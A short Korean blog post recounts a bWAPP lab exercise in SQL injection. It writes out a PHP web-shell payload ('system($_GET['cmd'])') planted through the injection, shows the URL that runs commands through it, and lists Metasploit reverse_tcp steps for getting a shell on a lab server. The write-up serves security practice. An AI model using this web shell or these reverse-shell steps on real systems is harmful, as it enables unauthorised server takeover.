카테고리 없음 bWAPP을 이용한 SQL 실습 작성자 - 재감자숭 옛 기억을 살려 bWAPP을 이용한 SQL Injection 실습을 다시 진행해보았다. 너무 오랜만에 진행해서 그런지 처음엔 좀 헤맸는데 하다보니 잊고 있던 것들을 떠올릴 수 있는 시간이였다. 공격 시나리오 SQL Injeciton 페이지의 취약점을 이용하여 SQL query문을 조작하고 교재에 나와 있는 SQL Injection을 사용하여 페이로드를 작성 DB가 MY SQL로 설정되어 있어 #을 사용하고 페이로드를 살펴보면 중간에 PHP 코드가 들어간 것을 확인 <?php system($_GET[‘cmd’]) ?> php언어를 사용하여 페이로드 사이에 시스템 함수를 삽입 파라미터 값으로 위 코드로 인젝션을 시도하면 파일업로드가 실행하고 디렉토리 리스팅 취약점을 활용하여 성공여부를 확인, 디렉토리 리스팅은 bWAPP 홈페이지 url 주소에서 맨 마지막 페이지 부분을 /images로 수정하여 확인 sqli.php 실행 시켜 예제된 코드를 동작 할 수 있도록 한다. bWAPP/images/sqli.php?cmd=ls –al url 주소를 위와 같이 바꾼다 그림과 같이 리눅스 상에 명령어가 웹에서 동작되는 것을 확인 msfconsole 명령어를 입력하여 실행 - sqli.rb 파일을 사용하여 익스플로잇을 시도 - reverse_tcp를 서버와의 연결을 시도 - 서버는 RHOST를 사용하여 192.168.40.142로 SET - exploit 명령어를 입력하여 공격를 시행 - 기존에 SET해두었던 주소를 타겟으로 연결 성공 여부 정보를 출력 shell 명령어를 실행하여 공격자가 타겟 서버에 대한 쉘 권한을 취득 ls –al 명령어를 실행하면 위와 같이 msf을 활용한 공격이 정상적으로 수행되는 것을 확인 가능 공유하기 게시글 관리 MSS 저작자표시 비영리 Contents 댓글 0 + 이전 댓글 더보기